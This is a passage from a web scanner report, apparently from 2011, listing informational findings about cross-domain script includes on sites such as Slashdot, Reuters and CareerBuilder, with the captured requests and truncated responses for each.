Set-Cookie: pds%5Fprof%5Flife=d=%2f0%2fSNRQANJZKOAJECq4fuATs16FghsQBYQAIAAoAewAAAHwAAgAAAAAAAAAAAAAA&v=5; domain=.barnesandnoble.com; expires=Fri, 02-Sep-2016 01:23:43 GMT; path=/
Set-Cookie: pds%5Flife=d=AQAw9qTVv8oLrLVmei2ledNrPyUXm7x5jgqi12MjRitKAKjnGigKHspVh2gOF1gyvghtGR%2ffErW1kHRLKuMKmS6B&v=5; domain=.barnesandnoble.com; expires=Fri, 02-Sep-2016 01:23:43 GMT; path=/
Set-Cookie: pds%5Fsess=d=AQDHu9rRnD%2fjrm8xcUgxEoj1Ylkl91VD8B%2bNGqKkf2oKsODN%2bAeOfCX4zlRMNjdk3QTJPGq5srW21wstdDzZfL2wxAnpys7HVCWpD97KNbjNRaKzSOJKXov3Z%2fvO1s3OLEc%3d&v=5; domain=.barnesandnoble.com; path=/
Set-Cookie: pds%5Fvcart%5Fsess=d=dof%2fQCAAIDJzmP6bP5jsrwnis1h3Kt8OO9Ec3ZRg76Y4McQBYQAEAAIAaQAAAAQA&v=5; domain=.barnesandnoble.com; path=/

...<!DOCTYPE html SYSTEM "about:legacy-compat"><html><head><META http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="description" content="BARNES & NOBLE: The Sacramento Bee b
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://img1.imagesbn.com/presources/product/css/product-book-widgets-v3.css"> <script type="text/javascript" src="http://img1.imagesbn.com/pace/js/externro/jquery-1.4.2.min.js"> </script>
...[SNIP]...
</script><script type="text/javascript" src="http://img1.imagesbn.com/presources/community/js/jquery-latest.js"> </script><script type="text/javascript" src="http://img1.imagesbn.com/pace/js/externro/jquery.tools.min.js"> </script><script type="text/javascript" src="http://img1.imagesbn.com/pace/js/core/core.js"> </script><script type="text/javascript" src="http://img1.imagesbn.com/presources/global/js/bn.ui.js"> </script><script type="text/javascript" src="http://img1.imagesbn.com/presources/global/js/bn.nav.js"> </script><script type="text/javascript" src="http://img1.imagesbn.com/presources/global/js/jquery/plugins/jquery.hoverintent.js"> </script>
...[SNIP]...
</script><script type="text/javascript" src="http://img1.imagesbn.com/pimages/js/bn_analytics.js"> </script><script type="text/javascript" src="http://img1.imagesbn.com/presources/community/js/ui.js"> </script><script type="text/javascript" src="http://img1.imagesbn.com/pimages/js/productpreview.js"> </script><script type="text/javascript" src="http://img1.imagesbn.com/pimages/js/bnnav.js"> </script><script type="text/javascript" src="http://img1.imagesbn.com/presources/js/signin.js"> </script><script type="text/javascript" src="http://img1.imagesbn.com/presources/js/bnNavEvents.js"> </script>
...[SNIP]...
</script><script type="text/javascript" src="http://img1.imagesbn.com/presources/js/visualcart_prodid.js"> </script><script type="text/javascript" src="http://img1.imagesbn.com/presources/js/webservice-core_v2.js"> </script><script type="text/javascript" src="http://img1.imagesbn.com/pimages/iframe/iframeKMP.js"> </script><script type="text/javascript" src="http://img1.imagesbn.com/presources/js/bnautosuggest.js"> </script><script type="text/javascript" src="http://img1.imagesbn.com/presources/community/js/reviews.js"> </script><script type="text/javascript" src="http://img1.imagesbn.com/presources/community/js/share_this_page.js"> </script><script type="text/javascript" src="http://img1.imagesbn.com/presources/js/dropdownbn07.js"> </script><script type="text/javascript" src="http://img1.imagesbn.com/presources/js/formbn07.js"> </script><script type="text/javascript" src="http://img1.imagesbn.com/presources/product/js/jquerypdp07.js"> </script><script language="Javascript" src="http://img1.imagesbn.com/pimages/js/modPop.js"> </script><script language="Javascript" src="http://img1.imagesbn.com/pimages/js/imgviewer.js"> </script><script language="Javascript" src="http://img1.imagesbn.com/presources/product/js/productPage.js"> </script>
...[SNIP]...
</div> <script type="text/javascript" src="http://img1.imagesbn.com/presources/global/js/bn-global.js"> </script>
...[SNIP]...

21.17. http://slashdot.org/bookmark.pl previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://slashdot.org
Path:	/bookmark.pl

Issue detail

The response dynamically includes the following script from another domain:

http://a.fsdn.com/sd/all-minified.js?release_20110825.03

Request

GET /bookmark.pl HTTP/1.1
Host: slashdot.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.42 (Unix) mod_perl/1.31
X-Powered-By: Slash 2.00500120110825.03
X-Bender: You can trust anything!
X-XRDS-Location: http://slashdot.org/slashdot.xrds
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 15218
Date: Sun, 04 Sep 2011 01:24:04 GMT
X-Varnish: 19386691
Age: 0
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>

<meta name="viewport" content="width=device-width, user-scalable=yes, initial-scale=1.0, maximum-scale=10.0" />
<meta name="apple-mobile-web-app-capab
...[SNIP]...
<![endif]-->

<script src="//a.fsdn.com/sd/all-minified.js?release_20110825.03" type="text/javascript"></script>
...[SNIP]...

21.18. http://stockscreener.us.reuters.com/Stock/US/Index previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://stockscreener.us.reuters.com
Path:	/Stock/US/Index

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/us.reuters/bizfinance/stockscreener;type=leaderboard;tile=1;sz=728x90;ord=9065919?
http://ad.doubleclick.net/adj/us.reuters/bizfinance/stockscreener;type=mpu;tile=2;sz=300x250;ord=9065919?
http://ad.doubleclick.net/adj/us.reuters/bizfinance/stockscreener;type=sponsorlogo;sz=1x1;ord=9065919?

Request

GET /Stock/US/Index HTTP/1.1
Host: stockscreener.us.reuters.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Connection: close
Date: Sun, 04 Sep 2011 01:24:18 GMT
Content-Length: 44685
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="NON PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND", policyref="/w3c/p3p.xml"
Set-Cookie: 2175%5F0=33102379A759622F79DDD60D2E655902; path=/; HttpOnly
Set-Cookie: GZIP=0; expires=Tue, 04-Oct-2011 01:24:18 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>Reuters.com | Stock S
...[SNIP]...

               <script language='JavaScript' src='http://ad.doubleclick.net/adj/us.reuters/bizfinance/stockscreener;type=leaderboard;tile=1;sz=728x90;ord=9065919?' type='text/javascript'></script>
...[SNIP]...

               <script language='JavaScript' src='http://ad.doubleclick.net/adj/us.reuters/bizfinance/stockscreener;type=sponsorlogo;sz=1x1;ord=9065919?' type='text/javascript'></script>
...[SNIP]...

               <script language='JavaScript' src='http://ad.doubleclick.net/adj/us.reuters/bizfinance/stockscreener;type=mpu;tile=2;sz=300x250;ord=9065919?' type='text/javascript'></script>
...[SNIP]...

21.19. http://und.cbscollegestore.com/store.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://und.cbscollegestore.com
Path:	/store.cfm

Issue detail

The response dynamically includes the following scripts from other domains:

http://dw.com.com/js/dw.js
http://secure-us.imrworldwide.com/v53.js

Request

GET /store.cfm HTTP/1.1
Host: und.cbscollegestore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:24:22 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 66505

<!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script typ
...[SNIP]...

<script type="text/javascript" src="http://dw.com.com/js/dw.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v53.js"></script>
...[SNIP]...

21.20. http://und.cbscollegestore.com/store_contents.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://und.cbscollegestore.com
Path:	/store_contents.cfm

Issue detail

The response dynamically includes the following scripts from other domains:

http://dw.com.com/js/dw.js
http://secure-us.imrworldwide.com/v53.js

Request

GET /store_contents.cfm HTTP/1.1
Host: und.cbscollegestore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:24:27 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 74160

<!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script typ
...[SNIP]...

<script type="text/javascript" src="http://dw.com.com/js/dw.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v53.js"></script>
...[SNIP]...

21.21. http://www.bayareasearchengineacademy.org/blog/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bayareasearchengineacademy.org
Path:	/blog/

Issue detail

The response dynamically includes the following scripts from other domains:

http://nwidget.networkedblogs.com/getnetworkwidget?bid=499174
http://onlywire.com/btn/button_51086
http://w.sharethis.com/button/buttons.js

Request

GET /blog/ HTTP/1.1
Host: www.bayareasearchengineacademy.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 01:25:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Pingback: http://www.bayareasearchengineacademy.org/blog/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 86552

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...

<script charset="utf-8" type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...
</p>
<script type="text/javascript" class="owbutton" src="http://onlywire.com/btn/button_51086" title="How To Learn SEO Online" url="http://www.bayareasearchengineacademy.org/blog/?p=394"></script>
...[SNIP]...
</p>
<script type="text/javascript" class="owbutton" src="http://onlywire.com/btn/button_51086" title="Five Free Keyword Research Tools for SEO and Article Generating Ideas" url="http://www.bayareasearchengineacademy.org/blog/?p=383"></script>
...[SNIP]...
</p>
<script type="text/javascript" class="owbutton" src="http://onlywire.com/btn/button_51086" title="Livermore Chamber of Commerce Marketing Summit" url="http://www.bayareasearchengineacademy.org/blog/?p=367"></script>
...[SNIP]...
</p>
<script type="text/javascript" class="owbutton" src="http://onlywire.com/btn/button_51086" title="East Bay SEO and Internet Marketing Meetup" url="http://www.bayareasearchengineacademy.org/blog/?p=362"></script>
...[SNIP]...
</p>
<script type="text/javascript" class="owbutton" src="http://onlywire.com/btn/button_51086" title="Google's Webmaster Tools Have Exciting New Features" url="http://www.bayareasearchengineacademy.org/blog/?p=356"></script>
...[SNIP]...
</p>
<script type="text/javascript" class="owbutton" src="http://onlywire.com/btn/button_51086" title="When Social Media Turns, Well, "Social"" url="http://www.bayareasearchengineacademy.org/blog/?p=349"></script>
...[SNIP]...
</p>
<script type="text/javascript" class="owbutton" src="http://onlywire.com/btn/button_51086" title="How to Submit Your Website to a Search Engine for Free" url="http://www.bayareasearchengineacademy.org/blog/?p=335"></script>
...[SNIP]...
</p>
<script type="text/javascript" class="owbutton" src="http://onlywire.com/btn/button_51086" title="Get Your Business Listed On Google Maps In Five Steps" url="http://www.bayareasearchengineacademy.org/blog/?p=322"></script>
...[SNIP]...
</p>
<script type="text/javascript" class="owbutton" src="http://onlywire.com/btn/button_51086" title="Facebook Security for Professionals: How To Manage Your Friends" url="http://www.bayareasearchengineacademy.org/blog/?p=315"></script>
...[SNIP]...
</p>
<script type="text/javascript" class="owbutton" src="http://onlywire.com/btn/button_51086" title="30 Day Blogging Challenge - Post #1" url="http://www.bayareasearchengineacademy.org/blog/?p=302"></script>
...[SNIP]...
</script><script src="http://nwidget.networkedblogs.com/getnetworkwidget?bid=499174" type="text/javascript"></script>
...[SNIP]...

21.22. http://www.careerbuilder.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.careerbuilder.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.7/jquery-ui.min.js
http://edge.quantserve.com/quant.js
http://img.icbdr.com/Common/js/cblibraryajaxbase.min.js
http://img.icbdr.com/common/js/SiteCatalystH.js
http://img.icbdr.com/v13.42/Common/js/autocomplete/cbautocomplete.js
http://img.icbdr.com/v13.42/Common/js/jobseeker/ads/delayedad.js
http://img.icbdr.com/v13.42/Common/js/jobseeker/jobcenter.js
http://img.icbdr.com/v13.42/Common/js/jobseeker/quickbarkeywordfocusfix.js
http://img.icbdr.com/v13.42/Common/js/jquery/dropshadow/jquery.dropshadow.min.js
http://img.icbdr.com/v13.42/Common/js/jquery/jquery.cblibrary.min.js
http://img.icbdr.com/v13.42/Common/js/movingobj.js
http://img.icbdr.com/v13.42/Common/js/popup.js
http://img.icbdr.com/v13.42/Common/js/searchbar.js

Request

GET / HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 51606
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
X-Powered-By: ASP.NET
X-PBY: BEARWEB54
Date: Sun, 04 Sep 2011 01:25:19 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="HTMLTag" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US"
...[SNIP]...
</script><script type="text/javascript" src="http://img.icbdr.com/Common/js/cblibraryajaxbase.min.js"></script><script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script><script type="text/javascript" src="http://img.icbdr.com/v13.42/Common/js/jquery/jquery.cblibrary.min.js"></script><script type="text/javascript" src="http://img.icbdr.com/v13.42/Common/js/movingobj.js"></script><script type="text/javascript" src="http://img.icbdr.com/v13.42/Common/js/jobseeker/jobcenter.js"></script><script type="text/javascript" src="http://img.icbdr.com/v13.42/Common/js/jobseeker/ads/delayedad.js"></script><script type="text/javascript" src="http://img.icbdr.com/v13.42/Common/js/popup.js"></script><script type="text/javascript" src="http://img.icbdr.com/v13.42/Common/js/jquery/dropshadow/jquery.dropshadow.min.js"></script><script type="text/javascript" src="http://img.icbdr.com/v13.42/Common/js/searchbar.js"></script><script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.7/jquery-ui.min.js"></script><script type="text/javascript" src="http://img.icbdr.com/v13.42/Common/js/autocomplete/cbautocomplete.js"></script><script type="text/javascript" src="http://img.icbdr.com/v13.42/Common/js/jobseeker/quickbarkeywordfocusfix.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://img.icbdr.com/common/js/SiteCatalystH.js"></script>
...[SNIP]...

21.23. http://www.careerbuilder.com/JobPoster/Products/PostJobsInfo.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.careerbuilder.com
Path:	/JobPoster/Products/PostJobsInfo.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js
http://img.icbdr.com/Common/js/cblibraryajaxbase.min.js
http://img.icbdr.com/common/js/SiteCatalystH.js
http://img.icbdr.com/images/jp/content/js/jp-products-priceswitch.js
http://img.icbdr.com/v13.42/Common/js/jquery/jquery.cblibrary.min.js
http://img.icbdr.com/v13.42/Common/js/rdbsearchlicenselinkcontrol.js

Request

GET /JobPoster/Products/PostJobsInfo.aspx HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 36509
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=dbe0a97eaa0d435580963487f7d94f26-368400317-wg-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X18BA4104DA31F1C4013902035B0F149F80C4ADCFFAF0328D1678179B99F5E10F498A47E1AC5E928595C998D529EF87A26; domain=.careerbuilder.com; expires=Tue, 04-Sep-2012 01:25:17 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: BEAR17
Date: Sun, 04 Sep 2011 01:25:16 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="HTMLTag" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US"
...[SNIP]...
</script><script type="text/javascript" src="http://img.icbdr.com/Common/js/cblibraryajaxbase.min.js"></script><script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script><script type="text/javascript" src="http://img.icbdr.com/v13.42/Common/js/jquery/jquery.cblibrary.min.js"></script><script type="text/javascript" src="http://img.icbdr.com/v13.42/Common/js/rdbsearchlicenselinkcontrol.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://img.icbdr.com/images/jp/content/js/jp-products-priceswitch.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://img.icbdr.com/common/js/SiteCatalystH.js"></script>
...[SNIP]...

21.24. http://www.careerbuilder.com/JobSeeker/Resumes/PostResumeNew/PostYourResume.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.careerbuilder.com
Path:	/JobSeeker/Resumes/PostResumeNew/PostYourResume.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js
http://img.icbdr.com/Common/js/cblibraryajaxbase.min.js
http://img.icbdr.com/common/js/SiteCatalystH.js
http://img.icbdr.com/v13.42/Common/js/jquery/dropshadow/jquery.dropshadow.min.js
http://img.icbdr.com/v13.42/Common/js/jquery/jquery.cblibrary.min.js
http://img.icbdr.com/v13.42/Common/js/popup.js
http://img.icbdr.com/v13.42/Common/js/searchbar.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 34350
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=724f92f936a743f6a3638215db1bfbe7-368400317-x3-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X18BA4104DA31F1C4013902035B0F149F80C4ADCFFAF0328D1678179B99F5E10F498A47E1AC5E928595C998D529EF87A26; domain=.careerbuilder.com; expires=Tue, 04-Sep-2012 01:25:16 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: BEAR39
Date: Sun, 04 Sep 2011 01:25:16 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="HTMLTag" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US"
...[SNIP]...
</script><script type="text/javascript" src="http://img.icbdr.com/Common/js/cblibraryajaxbase.min.js"></script><script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script><script type="text/javascript" src="http://img.icbdr.com/v13.42/Common/js/jquery/jquery.cblibrary.min.js"></script><script type="text/javascript" src="http://img.icbdr.com/v13.42/Common/js/popup.js"></script><script type="text/javascript" src="http://img.icbdr.com/v13.42/Common/js/jquery/dropshadow/jquery.dropshadow.min.js"></script><script type="text/javascript" src="http://img.icbdr.com/v13.42/Common/js/searchbar.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://img.icbdr.com/common/js/SiteCatalystH.js"></script>
...[SNIP]...

21.25. http://www.careerbuilder.com/Jobseeker/Jobs/JobResults.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.careerbuilder.com
Path:	/Jobseeker/Jobs/JobResults.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.7/jquery-ui.min.js
http://img.icbdr.com/Common/js/AJAXLibs/System.Web.Extensions/3.5.0.0/3.5.30729.196/MicrosoftAjax.js
http://img.icbdr.com/Common/js/cblibraryajaxbase.min.js
http://img.icbdr.com/common/js/SiteCatalystH.js
http://img.icbdr.com/v13.42/Common/js/ajaxlogin.js
http://img.icbdr.com/v13.42/Common/js/cbatlascore.js
http://img.icbdr.com/v13.42/Common/js/contentrequest.js
http://img.icbdr.com/v13.42/Common/js/jobsearching.js
http://img.icbdr.com/v13.42/Common/js/jobseeker/ads/delayedad.js
http://img.icbdr.com/v13.42/Common/js/jobseeker/joblistalternatingstylesfix.js
http://img.icbdr.com/v13.42/Common/js/jobseeker/jobsearching.js
http://img.icbdr.com/v13.42/Common/js/jobseeker/popups/dialogoverflash.js
http://img.icbdr.com/v13.42/Common/js/jobseeker/popups/emailjob.js
http://img.icbdr.com/v13.42/Common/js/jobseeker/popups/savejob.js
http://img.icbdr.com/v13.42/Common/js/jquery/dropshadow/jquery.dropshadow.min.js
http://img.icbdr.com/v13.42/Common/js/jquery/jquery.cblibrary.min.js
http://img.icbdr.com/v13.42/Common/js/jquery/jquery.cookie.js
http://img.icbdr.com/v13.42/Common/js/popup.js
http://img.icbdr.com/v13.42/Common/js/searchbar.js

Request

GET /Jobseeker/Jobs/JobResults.aspx HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 182682
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: jobresults.aspx:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR29
Date: Sun, 04 Sep 2011 01:25:13 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="HTMLTag" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US"
...[SNIP]...
</script><script type="text/javascript" src="http://img.icbdr.com/Common/js/cblibraryajaxbase.min.js"></script>
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJODMxMzQ0NjkxZGRl5+DncdAXWQpSCrKhGSIVwvdWCg==" />

<script src="http://img.icbdr.com/Common/js/AJAXLibs/System.Web.Extensions/3.5.0.0/3.5.30729.196/MicrosoftAjax.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v13.42/Common/js/cbatlascore.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v13.42/Common/js/jquery/jquery.cblibrary.min.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v13.42/Common/js/jobsearching.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v13.42/Common/js/popup.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v13.42/Common/js/jquery/jquery.cookie.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v13.42/Common/js/jobseeker/jobsearching.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v13.42/Common/js/contentrequest.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v13.42/Common/js/jobseeker/joblistalternatingstylesfix.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v13.42/Common/js/ajaxlogin.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.7/jquery-ui.min.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v13.42/Common/js/jobseeker/popups/dialogoverflash.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v13.42/Common/js/jobseeker/popups/savejob.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v13.42/Common/js/jobseeker/popups/emailjob.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v13.42/Common/js/jobseeker/ads/delayedad.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v13.42/Common/js/jquery/dropshadow/jquery.dropshadow.min.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v13.42/Common/js/searchbar.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://img.icbdr.com/common/js/SiteCatalystH.js"></script>
...[SNIP]...

21.26. http://www.careerbuilder.com/jobseeker/companies/companysearch.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.careerbuilder.com
Path:	/jobseeker/companies/companysearch.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.7/jquery-ui.min.js
http://img.icbdr.com/Common/js/cblibraryajaxbase.min.js
http://img.icbdr.com/common/js/SiteCatalystH.js
http://img.icbdr.com/v13.42/Common/js/autocomplete/cbautocomplete.js
http://img.icbdr.com/v13.42/Common/js/jquery/dropshadow/jquery.dropshadow.min.js
http://img.icbdr.com/v13.42/Common/js/jquery/jquery.cblibrary.min.js
http://img.icbdr.com/v13.42/Common/js/popup.js
http://img.icbdr.com/v13.42/Common/js/searchbar.js

Request

GET /jobseeker/companies/companysearch.aspx HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 242405
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
X-Powered-By: ASP.NET
X-PBY: BEAR37
Date: Sun, 04 Sep 2011 01:25:13 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="HTMLTag" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US"
...[SNIP]...
</script><script type="text/javascript" src="http://img.icbdr.com/Common/js/cblibraryajaxbase.min.js"></script><script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script><script type="text/javascript" src="http://img.icbdr.com/v13.42/Common/js/jquery/jquery.cblibrary.min.js"></script><script type="text/javascript" src="http://img.icbdr.com/v13.42/Common/js/popup.js"></script><script type="text/javascript" src="http://img.icbdr.com/v13.42/Common/js/jquery/dropshadow/jquery.dropshadow.min.js"></script><script type="text/javascript" src="http://img.icbdr.com/v13.42/Common/js/searchbar.js"></script><script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.7/jquery-ui.min.js"></script><script type="text/javascript" src="http://img.icbdr.com/v13.42/Common/js/autocomplete/cbautocomplete.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://img.icbdr.com/common/js/SiteCatalystH.js"></script>
...[SNIP]...

21.27. http://www.careerbuilder.com/jobseeker/jobs/jobfindadv.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.careerbuilder.com
Path:	/jobseeker/jobs/jobfindadv.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.7/jquery-ui.min.js
http://img.icbdr.com/Common/js/AJAXLibs/System.Web.Extensions/3.5.0.0/3.5.30729.196/MicrosoftAjax.js
http://img.icbdr.com/Common/js/cblibraryajaxbase.min.js
http://img.icbdr.com/common/js/SiteCatalystH.js
